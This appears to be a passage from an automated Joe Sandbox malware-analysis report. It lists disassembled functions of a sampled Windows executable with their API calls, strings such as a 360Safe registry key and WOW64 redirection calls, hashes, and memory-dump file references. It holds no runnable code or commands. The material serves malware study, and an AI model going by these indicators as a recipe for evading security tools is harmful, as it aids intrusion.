Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset$Valuelstrcmpi
String ID: Software\360Safe\Liveup$mid
API String ID: 999496690-2395435937
Opcode ID: c99ca5e81b02d1620d9dc4415e0673db51d686a5c0c6622f0e281984eff48d7a
Instruction ID: b492119fd73ce0d9529ffcaaf72970bcda56fcff49eeb761907619a045a37326
Opcode Fuzzy Hash: c99ca5e81b02d1620d9dc4415e0673db51d686a5c0c6622f0e281984eff48d7a
Instruction Fuzzy Hash: 884117315043459FD735DB24C841BFB77D8AFA6708F08492EE58A87281EB34991DCB5B

Function 00445030 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,C1DE166F,?,?,lLD,00000000,lLD,?,00444C6C), ref: 00445075
lstrlenW.KERNEL32(lLD,?,?,?,?,00444C6C), ref: 004450C1
_memcpy_s.LIBCMT ref: 00445118
_memcpy_s.LIBCMT ref: 00445124

Part of subcall function 00444FC0: __recalloc.LIBCMT ref: 00444FCD

Strings

lLD, xrefs: 00445044
lLD, xrefs: 004450B3, 0044511D, 004450BD, 00445121

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memcpy_slstrlen$__recalloc
String ID: lLD$lLD
API String ID: 1038713732-1198736092
Opcode ID: 2613f6afb0587b0240ca8d82e27b7046b2345f137546d3ad361dce21ac8a7a0b
Instruction ID: 76f46c6b4e9b1c165fe8e5f8dbeab75f6ab2c34161f461d2edcfd4d4216f2fc1
Opcode Fuzzy Hash: 2613f6afb0587b0240ca8d82e27b7046b2345f137546d3ad361dce21ac8a7a0b
Instruction Fuzzy Hash: 9E41A671E002099FDF14DFA9D882AEFB7F8EB48314F10452FE905A7241DB799900CBA5

Function 0046C460 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,00000001,?,?,?), ref: 0046C4D6
GetWindowLongW.USER32(00000001,000000FC), ref: 0046C4E7
CallWindowProcW.USER32(?,00000001,00000082,?,?), ref: 0046C4FF
GetWindowLongW.USER32(00000001,000000FC), ref: 0046C519
SetWindowLongW.USER32(00000001,000000FC,?), ref: 0046C52E

Strings

$, xrefs: 0046C4A4

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 804adb479330d2158328d58e8ec34ddf2a6ad6c4fffd224ca4cc7b18ecfb6e8b
Instruction ID: 829c855f8e88a4c409aa734e283a464b9be5b60d3a12ba7bd4f9b40a6a5a15f1
Opcode Fuzzy Hash: 804adb479330d2158328d58e8ec34ddf2a6ad6c4fffd224ca4cc7b18ecfb6e8b
Instruction Fuzzy Hash: A741FAB5600614AFCB24CF59D8849ABB7F8FB88710B108A1EF99AD7750D734E941CFA4

Function 00486512 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004865A1
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 004865CA
GetWindowLongW.USER32(?,000000FC), ref: 004865DC
GetWindowLongW.USER32(?,000000FC), ref: 004865ED
SetWindowLongW.USER32(?,000000FC,?), ref: 00486609

Strings

,, xrefs: 004865C0

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 9b1428e27582b108472f702563873b26a1a01680aeb2374d7e618b7780049f84
Instruction ID: fcf382016dc8bdb5a7b8c00e16659be162168b8252942fa143cdf4702e046031
Opcode Fuzzy Hash: 9b1428e27582b108472f702563873b26a1a01680aeb2374d7e618b7780049f84
Instruction Fuzzy Hash: D431C370600611AFCB20BF79D888A6EB7E5BF48314F160A3EE54597791DB38E800CB58

Function 0045D030 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0045D05C
std::_Lockit::_Lockit.LIBCPMT ref: 0045D07F
std::bad_exception::bad_exception.LIBCMT ref: 0045D100
__CxxThrowException@8.LIBCMT ref: 0045D10E
std::locale::facet::facet_Register.LIBCPMT ref: 0045D124

Strings

bad cast, xrefs: 0045D0F8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::facet_
String ID: bad cast
API String ID: 2820251361-3145022300
Opcode ID: 36f45527c1993e9c0908d335247eb52a3247d3d68a63233d3d8bad60fc7321dd
Instruction ID: 7bf741a993d0c1209fd146737be52ef960b82879b5bc942997691f085403d98c
Opcode Fuzzy Hash: 36f45527c1993e9c0908d335247eb52a3247d3d68a63233d3d8bad60fc7321dd
Instruction Fuzzy Hash: FC31F271C042449FCB24EF64D881BAE73A4EF15B29F14016FD8116B2D3DB796D09C799

Function 0045D150 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0045D17C
std::_Lockit::_Lockit.LIBCPMT ref: 0045D19F
std::bad_exception::bad_exception.LIBCMT ref: 0045D220
__CxxThrowException@8.LIBCMT ref: 0045D22E
std::locale::facet::facet_Register.LIBCPMT ref: 0045D244

Strings

bad cast, xrefs: 0045D218

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::facet_
String ID: bad cast
API String ID: 2820251361-3145022300
Opcode ID: 77b033a1b363c9e67cd224bfa9b5ca4d806d877a721923420266057633b5aa73
Instruction ID: 72d51fe72bc0de15526c41510fa9194ca7e6e6e4102038b75a01be6b4d044782
Opcode Fuzzy Hash: 77b033a1b363c9e67cd224bfa9b5ca4d806d877a721923420266057633b5aa73
Instruction Fuzzy Hash: 6631F271C046458FCB24DF54D881BAE73A4EF15729F10026FEC1167293DB79AD08C799

Function 0045D340 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0045D36C
std::_Lockit::_Lockit.LIBCPMT ref: 0045D38F
std::bad_exception::bad_exception.LIBCMT ref: 0045D410
__CxxThrowException@8.LIBCMT ref: 0045D41E
std::locale::facet::facet_Register.LIBCPMT ref: 0045D434

Strings

bad cast, xrefs: 0045D408

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::facet_
String ID: bad cast
API String ID: 2820251361-3145022300
Opcode ID: 7169fbc317ea9e0fd6b6b3d0ede992285e0d5dfbc91d4af71c6089bf3b6e5ec2
Instruction ID: 7970022716b180110f768240802ed4033eeb2d66d5a12a16ecee9e238d315453
Opcode Fuzzy Hash: 7169fbc317ea9e0fd6b6b3d0ede992285e0d5dfbc91d4af71c6089bf3b6e5ec2
Instruction Fuzzy Hash: E331BE31D042459FCB24DF64D881BAE73A4EF15729F10016FEC11A7293DB796D48CB9A

Function 0044D4B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0044D4DC
std::_Lockit::_Lockit.LIBCPMT ref: 0044D4FF
std::bad_exception::bad_exception.LIBCMT ref: 0044D580
__CxxThrowException@8.LIBCMT ref: 0044D58E
std::locale::facet::facet_Register.LIBCPMT ref: 0044D5A4

Strings

bad cast, xrefs: 0044D578

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::facet_
String ID: bad cast
API String ID: 2820251361-3145022300
Opcode ID: 12522b9aba4a0b83d1759b5fee24e2adf49f592b99bb51f5497fb028cc17e9d9
Instruction ID: d9bf2781218cc95fbf8f706060ec52ea95ff8a1dccc04515aaa26c978eb43943
Opcode Fuzzy Hash: 12522b9aba4a0b83d1759b5fee24e2adf49f592b99bb51f5497fb028cc17e9d9
Instruction Fuzzy Hash: BC31F271C00254ABEF15DF54D882BAE73B4EB14728F10016FD81167292DF79AE04CB99

Function 0044D5D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0044D5FC
std::_Lockit::_Lockit.LIBCPMT ref: 0044D61F
std::bad_exception::bad_exception.LIBCMT ref: 0044D6A0
__CxxThrowException@8.LIBCMT ref: 0044D6AE
std::locale::facet::facet_Register.LIBCPMT ref: 0044D6C4

Strings

bad cast, xrefs: 0044D698

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::facet_
String ID: bad cast
API String ID: 2820251361-3145022300
Opcode ID: 0d9f8468bdaf863f2a61bf606c1d461d1c9d514bc7d81e765f0ebf1741867dc5
Instruction ID: 8026f01a6717869527d51a5eb5d00ae58cd3e673c7bf6726ca7bfa461072674c
Opcode Fuzzy Hash: 0d9f8468bdaf863f2a61bf606c1d461d1c9d514bc7d81e765f0ebf1741867dc5
Instruction Fuzzy Hash: 2D3102B1D012058FDB14DF54C882BAE73A4EB15724F12026FE81567392DB796D04CBDD

Function 00429020 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 004290B9

Strings

%s:%s:%s, xrefs: 0042905C
{"title":"%s","theme":"%s","image":"%s"}, xrefs: 00429090
T9N, xrefs: 00429074
T9N, xrefs: 00429040

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FreeString
String ID: %s:%s:%s$T9N$T9N${"title":"%s","theme":"%s","image":"%s"}
API String ID: 3341692771-3300905566
Opcode ID: 3741a15595c67a699608fc0c360f0f6343a9976b189f38114e1fc55804e0ec9b
Instruction ID: a3d0368e9fba3e0aeb1f25213a65528420ed58a65e2b60f1059f0ac86c65f112
Opcode Fuzzy Hash: 3741a15595c67a699608fc0c360f0f6343a9976b189f38114e1fc55804e0ec9b
Instruction Fuzzy Hash: B9319F71600609AFD740CF58CC85E6BB3A9FF84324B14C66AE9158B361DB35AD06CBA4

Function 0042A520 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(sites.dll), ref: 0042A533

Strings

GetFileDataFromStorage, xrefs: 0042A554
GetFileLengthFromStorage, xrefs: 0042A54C
sites.dll, xrefs: 0042A52E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID: GetFileDataFromStorage$GetFileLengthFromStorage$sites.dll
API String ID: 4139908857-1979421132
Opcode ID: 205c3618236d13193b8898fb90c854bb3bf55a54a3c46c2efd1e888821f4b97f
Instruction ID: 1fa310f7eff1b83844a300552924f15398ef1374e5edf1b91b641dc429db63ca
Opcode Fuzzy Hash: 205c3618236d13193b8898fb90c854bb3bf55a54a3c46c2efd1e888821f4b97f
Instruction Fuzzy Hash: BF01D6323403267BDB115AB9AC80ABB73DC9FC5725750402BFD0CC7202EA38D85582A9

Function 0047E760 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Kernel32.dll,?,?,0046707B,C1DE166F,?,?), ref: 0047E792
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0047E7AB
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0047E7BA

Strings

Wow64DisableWow64FsRedirection, xrefs: 0047E7A5
Wow64RevertWow64FsRedirection, xrefs: 0047E7B4
Kernel32.dll, xrefs: 0047E781

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
API String ID: 2238633743-1575494070
Opcode ID: be671781c8c432fcebdbfcb8745fcd3c82e020e70c8d0e22d2799a6f5ff895f8
Instruction ID: 4ecdc83dd5505c3cbb38689492599f8d91eda5e768caebdcd881cf47f59fc17b
Opcode Fuzzy Hash: be671781c8c432fcebdbfcb8745fcd3c82e020e70c8d0e22d2799a6f5ff895f8
Instruction Fuzzy Hash: 2E0125B56003899FC724DFA6ECC0966F7E8EB59701331456FE459C7721C7356880CB58

Function 0047E820 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Kernel32.dll,004C0CB4,0046D5DF), ref: 0047E84C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0047E864
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0047E873

Strings

Wow64DisableWow64FsRedirection, xrefs: 0047E85E
Wow64RevertWow64FsRedirection, xrefs: 0047E86D
Kernel32.dll, xrefs: 0047E83B

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
API String ID: 2238633743-1575494070
Opcode ID: e501e02ad7344acbb4263cb58b87f254c23cca5508dab8845d0b4c2e2ecfd66a
Instruction ID: a01be648aa922b1640926440c58b6a2f55d0dbd03a48ea489f8060510f167247
Opcode Fuzzy Hash: e501e02ad7344acbb4263cb58b87f254c23cca5508dab8845d0b4c2e2ecfd66a
Instruction Fuzzy Hash: 9CF0DAB09003419BC7619F6AEC84A55F7E8EBE5B01322556FE4A5C7231D7745481CB58

Function 004803B0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(sites.dll,?,00480587,00480B8B,C1DE166F,004276DB,?,?,000000FF), ref: 004803B6
GetProcAddress.KERNEL32(00000000,GetFileLengthFromStorage), ref: 004803CF
GetProcAddress.KERNEL32(00000000,GetFileDataFromStorage), ref: 004803DC

Strings

GetFileDataFromStorage, xrefs: 004803D1
GetFileLengthFromStorage, xrefs: 004803C9
sites.dll, xrefs: 004803B1

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetFileDataFromStorage$GetFileLengthFromStorage$sites.dll
API String ID: 667068680-1979421132
Opcode ID: ba44ad3ebad217459ec54b6af6064ea26d7671eb7bb5d99ab269c39b9de9ea0a
Instruction ID: 76776a9aca3c09fab9a284d6ac2efe263d43b6458e039b26a7ef354f785f9032
Opcode Fuzzy Hash: ba44ad3ebad217459ec54b6af6064ea26d7671eb7bb5d99ab269c39b9de9ea0a
Instruction Fuzzy Hash: BAE092315617119BD6D0AB387C04F8F3698DB90B90F06013BEC0096252D779C941879C

Function 00428370 Relevance: 9.3, APIs: 6, Instructions: 258COMMON

Download Yara Rule

APIs

GdipCreateFromHDC.GDIPLUS(?,?,?,C1DE166F), ref: 00428415
CopyRect.USER32(?,?), ref: 00428449
GdipSetClipRectI.GDIPLUS(?,?,?,?,?,00000000,?,C1DE166F), ref: 00428490
GdipResetClip.GDIPLUS(?,?,?,00000000,00000000,00000000), ref: 00428545
GdipDeleteBrush.GDIPLUS(?,?,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 00428617
GdipDeleteGraphics.GDIPLUS(?,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 00428620

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
